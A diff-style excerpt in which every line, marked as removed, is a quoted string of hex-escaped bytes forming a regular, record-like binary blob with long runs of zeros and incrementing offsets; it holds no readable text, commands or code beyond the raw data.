-"\xcc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff\x00\x00\x16\x24\x01\x49" -"\x66\x01\x00\x00\x00\x61\x24\x01\x00\x07\x00\x00\x03\x24\x01\x12" -"\x64\x24\xff\x00\x00\x61\x24\x01\x00\x13\x00\x00\x03\x24\x03\x0e" -"\x84\x2d\x00\x0f\x84\x68\x01\x11\x84\x98\xfe\x12\x64\x10\xff\x00" -"\x00\x5d\x84\x2d\x00\x5e\x84\x68\x01\x60\x84\x98\xfe\x61\x24\x03" -"\x00\x07\x00\x00\x03\x24\x01\x12\x64\x68\x01\x01\x00\x61\x24\x01" -"\x00\x0e\x00\x00\x03\x24\x03\x0d\xc6\x0b\x00\x03\x65\x04\x7d\x0a" -"\x43\x17\x00\x00\x02\x12\x64\x38\xff\x00\x00\x61\x24\x03\x00\x16" -"\xaa\x6f\x00\x00\xb1\x6f\x00\x00\xbe\x6f\x00\x00\xcd\x6f\x00\x00" -"\xd8\x6f\x00\x00\xdc\x6f\x00\x00\xdd\x6f\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\x00\x00\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" 
-"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\xdd\x6f\x00\x00\xe0\x6f\x00\x00\xe5\x6f\x00\x00\xf1\x6f\x00\x00" -"\x00\x70\x00\x00\x0d\x70\x00\x00\x11\x70\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\x11\x70\x00\x00\x12\x70\x00\x00\x15\x70\x00\x00\x1a\x70\x00\x00" -"\x25\x70\x00\x00\x34\x70\x00\x00\x3e\x70\x00\x00\x41\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x03\x24\x01" -"\x12\x64\x24\xff\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61" -"\x24\x01\x00\xbd\x00\x00\x6b\x64\xf3\x00\x00\x00\x16\x24\x01\x17" -"\x24\x01\x49\x66\x01\x00\x00\x00\x02\x96\x46\x00\x05\xd6\x18\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x08\xd6\x88\x00\x06\xba\xff\x0d\x03" -"\xcf\x08\xab\x11\x08\x18\x57\x1f\xb4\x25\x00\x06\x53\x03\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\xc2\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\xdc\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x4f\x07\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x17\xf6\x03\x00\x00\x18" -"\xf6\x03\x00\x00\x1a\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1b" -"\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1c\xd6\x18\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x1d\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\x61\xf6\x03\x00\x00\x00\x06" -"\x3e\x70\x00\x00\x48\x70\x00\x00\x49\x70\x00\x00\x4c\x70\x00\x00" -"\x54\x70\x00\x00\x5f\x70\x00\x00\x6e\x70\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\xe6\x01\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" 
-"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\x6e\x70\x00\x00\x81\x70\x00\x00\x85\x70\x00\x00\x86\x70\x00\x00" -"\x95\x70\x00\x00\x8e\x70\x00\x00\xa2\x70\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" 
-"\xd9\x02\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\x40\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\xa2\x70\x00\x00\xb1\x70\x00\x00\xc3\x70\x00\x00\xd1\x70\x00\x00" -"\xd2\x70\x00\x00\xd5\x70\x00\x00\xd9\x70\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\xcc\x03\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\x94\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\xd9\x70\x00\x00\xe6\x70\x00\x00\xf5\x70\x00\x00\xfd\x70\x00\x00" 
-"\x01\x71\x00\x00\x02\x71\x00\x00\x05\x71\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x35\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\xbf\x04\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" -"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\xef\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" 
-"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\x05\x71\x00\x00\x0a\x71\x00\x00\x13\x71\x00\x00\x22\x71\x00\x00" -"\x2c\x71\x00\x00\x30\x71\x00\x00\x31\x71\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x35\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xbd\x00\x00\x6b\x64" -"\xb2\x05\x00\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00" -"\x02\x96\x46\x00\x05\xd6\x18\x04\x01\x00\x00\x04\x01\x00\x00\x04" -"\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x04\x01\x00\x00\x08" -"\xd6\x88\x00\x06\xba\xff\x0d\x03\xcf\x08\xab\x11\x08\x18\x57\x1f" -"\xb4\x25\x00\x06\x53\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\xc2\x05\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\xdc\x08\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06" -"\x5d\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x06\x4f\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x06\x5d\x06\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\xd6\x30\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00" -"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01" -"\x00\x00\x17\xf6\x03\x00\x00\x18\xf6\x03\x00\x00\x1a\xd6\x18\x00" -"\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00" -"\x00\x00\xff\x00\x00\x00\xff\x1b\xd6\x18\x00\x00\x00\xff\x00\x00" -"\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00" -"\x00\xff\x1c\xd6\x18\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00" 
-"\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x1d\xd6\x18" -"\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff\x00\x00\x00\xff" -"\x00\x00\x00\xff\x00\x00\x00\xff\x34\xd6\x06\x00\x01\x0a\x03\x46" -"\x00\x61\xf6\x03\x00\x00\x0c\x00\x00\x03\x24\x01\x12\x64\x24\xff" -"\x00\x00\x16\x24\x01\x49\x66\x01\x00\x00\x00\x61\x24\x01\x00\x06" -"\x31\x71\x00\x00\x34\x71\x00\x00\x39\x71\x00\x00\x46\x71\x00\x00" -"\x55\x71\x00\x00\x5b\x71\x00\x00\x5f\x71\x00\x00\xf3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 